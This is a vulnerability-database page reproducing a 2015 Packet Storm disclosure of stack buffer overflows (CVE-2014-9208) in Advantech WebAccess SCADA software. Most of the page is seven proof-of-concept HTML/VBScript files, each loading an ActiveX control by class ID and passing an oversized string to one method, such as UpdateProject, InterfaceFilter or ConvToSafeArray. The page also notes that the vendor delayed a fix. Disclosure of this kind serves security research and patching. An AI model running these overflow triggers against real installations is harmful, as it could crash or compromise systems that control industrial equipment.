Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
packetstormPraveen DarshanamPACKETSTORM:133475
HistorySep 07, 2015 - 12:00 a.m.

Advantech WebAccess 8.0 / 3.4.3 Code Execution

2015-09-0700:00:00
Praveen Darshanam
packetstormsecurity.com
42

EPSS

0.293

Percentile

96.9%

JSON
`Introduction  
*********************************************************************************  
Using Advantech WebAccess SCADA Software we can remotely manage Industrial  
Control systems devices like RTU's, Generators, Motors etc. Attackers can  
execute code remotely by passing maliciously crafted string to  
ConvToSafeArray API in ASPVCOBJLib.AspDataDriven ActiveX.  
  
Operating System: Windows SP1  
Affected Product: Advantech WebAccess 8.0, 3.4.3  
Vulnerable Program: AspVCObj.dll  
CVE-2014-9208  
  
*********************************************************************************  
Proof of Concept (PoC) for "Advantech WebAccess AspVCObj ActiveX  
UpdateProject Overflow Remote Code Execution"  
*********************************************************************************  
  
<?XML version='1.0' standalone='yes' ?>  
<html>  
<object classid='clsid:3703BA5D-7329-4E60-A1A5-AE7D6DF267C1' id='target' />  
<script language='vbscript'>  
  
<!--  
targetFile = "C:\WebAccess\Node\webdobj.dll"  
prototype = "Sub UpdateProject ( ByVal WwwPort As String , ByVal ProjName  
As String , ByVal ProjIP As String , ByVal ProjPort As Long , ByVal  
ProjTimeout As Long , ByVal ProjDir As String )"  
-->  
  
arg1="defaultV"  
arg2="defaultV"  
arg3=String(1044, "A")  
arg4=1  
arg5=1  
arg6="defaultV"  
  
target.UpdateProject arg1 ,arg2 ,arg3 ,arg4 ,arg5 ,arg6  
  
</script></html>  
</html>  
  
  
*********************************************************************************  
  
Proof of Concept (PoC) for "Advantech WebAccess AspVCObj ActiveX  
InterfaceFilter Overflow Remote Code Execution"  
*********************************************************************************  
<?XML version='1.0' standalone='yes' ?>  
<html>  
<object classid='clsid:89D00354-B2EA-4755-915D-615D3962C7D7' id='target' />  
<script language='vbscript'>  
<!--  
targetFile = "C:\WebAccess\Node\AspVCObj.dll"  
prototype = "Function InterfaceFilter ( ByVal Interface As String ) As  
String"  
-->  
  
arg1=String(1044, "A")  
  
target.InterfaceFilter arg1  
  
</script></html>  
  
  
*********************************************************************************  
Proof of Concept (PoC) for "Advantech WebAccess AspVCObj ActiveX  
FileProcess Overflow Remote Code Execution"  
*********************************************************************************  
  
<?XML version='1.0' standalone='yes' ?>  
<html>  
<object classid='clsid:89D00354-B2EA-4755-915D-615D3962C7D7' id='target' />  
<script language='vbscript'>  
<!--  
targetFile = "C:\WebAccess\Node\AspVCObj.dll"  
prototype = "Sub FileProcess ( ByVal Type As Integer , ByVal FileName As  
String )"  
-->  
  
arg1=1  
arg2=String(1044, "A")  
  
target.FileProcess arg1 ,arg2  
  
</script></html>  
  
  
*********************************************************************************  
Proof of Concept (PoC) for "Advantech WebAccess AspVCObj ActiveX  
GetWideStrCpy Overflow Remote Code Execution"  
*********************************************************************************  
<?XML version='1.0' standalone='yes' ?>  
<html>  
<object classid='clsid:89D00354-B2EA-4755-915D-615D3962C7D7' id='target' />  
<script language='vbscript'>  
<!--  
targetFile = "C:\WebAccess\Node\AspVCObj.dll"  
prototype = "Function GetWideStrCpy ( ByVal Type As Integer , ByVal inStr  
As String ) As String"  
-->  
  
arg1=1  
arg2=String(1044, "A")  
  
target.GetWideStrCpy arg1 ,arg2  
  
</script></html>  
  
*********************************************************************************  
Proof of Concept (PoC) for "Advantech WebAccess AspVCObj ActiveX  
GetRecipeInfo Overflow Remote Code Execution"  
*********************************************************************************  
<?XML version='1.0' standalone='yes' ?>  
<html>  
<object classid='clsid:89D00354-B2EA-4755-915D-615D3962C7D7' id='target' />  
<script language='vbscript'>  
<!--  
targetFile = "C:\WebAccess\Node\AspVCObj.dll"  
prototype = "Function GetRecipeInfo ( ByVal Type As Integer , ByVal  
filePath As String )"  
-->  
  
arg1=1  
arg2=String(1044, "A")  
  
target.GetRecipeInfo arg1 ,arg2  
  
</script></html>  
  
*********************************************************************************  
Proof of Concept (PoC) for "Advantech WebAccess AspVCObj ActiveX  
GetLastTagNbr Overflow Remote Code Execution"  
*********************************************************************************  
<?XML version='1.0' standalone='yes' ?>  
<html>  
<object classid='clsid:89D00354-B2EA-4755-915D-615D3962C7D7' id='target' />  
<script language='vbscript'>  
<!--  
targetFile = "C:\WebAccess\Node\AspVCObj.dll"  
prototype = "Function GetLastTagNbr ( ByVal TagName As String ) As String"  
-->  
  
arg1=String(1044, "A")  
  
target.GetLastTagNbr arg1  
  
</script></html>  
  
*********************************************************************************  
  
Proof of Concept (PoC) for "Advantech WebAccess AspVCObj ActiveX  
ConvToSafeArray Overflow Remote Code Execution"  
*********************************************************************************  
<?XML version='1.0' standalone='yes' ?>  
<html>  
<object classid='clsid:89D00354-B2EA-4755-915D-615D3962C7D7' id='target' />  
<script language='vbscript'>  
<!--  
targetFile = "C:\WebAccess\Node\AspVCObj.dll"  
prototype = "Function ConvToSafeArray ( ByVal ArrSize As Integer , ByVal  
inStr As String )"  
-->  
  
arg1=1  
arg2=String(2068, "A")  
  
target.ConvToSafeArray arg1 ,arg2  
  
</script></html>  
*********************************************************************************  
Vulnerabilities were reported to Advantech sometime in January/February  
2015, coordinated through CSOC.From April 2015 they has been postponing the  
fix.  
  
Best Regards,  
Praveen Darshanam  
  
  
`

Related

checkpoint_advisories 4
cvelist 1
zdt 2
cve 1
prion 1
ics 1
nvd 1
exploitdb 1
exploitpack 1
openvas 1
checkpoint_advisories
checkpoint_advisories
Advantech WebAccess AspVCObj.AspDataDriven ActiveX Stack Buffer Overflow (CVE-2014-9208)
2015-10-06 00:00:00
Advantech WebAccess ActiveX ConvToSafeArray Stack Buffer Overflow (CVE-2014-9208)
2015-10-26 00:00:00
Advantech WebAccess Webdobj ActiveX UpdateProject Stack Buffer Overflow (CVE-2014-9208)
2015-10-07 00:00:00
cvelist
cvelist
CVE-2014-9208
2015-09-11 16:00:00
zdt
zdt
Advantech WebAccess 8.0, 3.4.3 ActiveX - Multiple Vulnerabilities
2015-09-08 00:00:00
Advantech WebAccess 8.0, 3.4.3 ActiveX - Multiple Vulnerabilities
2015-09-09 00:00:00
cve
cve
CVE-2014-9208
2015-09-11 16:59:01
prion
prion
Stack overflow
2015-09-11 16:59:00
ics
ics
Advantech WebAccess Buffer Overflow Vulnerability (Update A)
2018-08-27 12:00:00
nvd
nvd
CVE-2014-9208
2015-09-11 16:59:01
exploitdb
exploitdb
Advantech Webaccess 8.0 / 3.4.3 - ActiveX Multiple Vulnerabilities
2015-09-08 00:00:00
exploitpack
exploitpack
Advantech Webaccess 8.0 3.4.3 - ActiveX Multiple Vulnerabilities
2015-09-08 00:00:00
openvas
openvas
Advantech WebAccess Multiple Buffer Overflow Vulnerabilities (Jan 2016)
2016-01-25 00:00:00

EPSS

0.293

Percentile

96.9%

JSON
Related for PACKETSTORM:133475
checkpoint_advisories4cvelist1zdt2cve1prion1ics1nvd1exploitdb1exploitpack1openvas1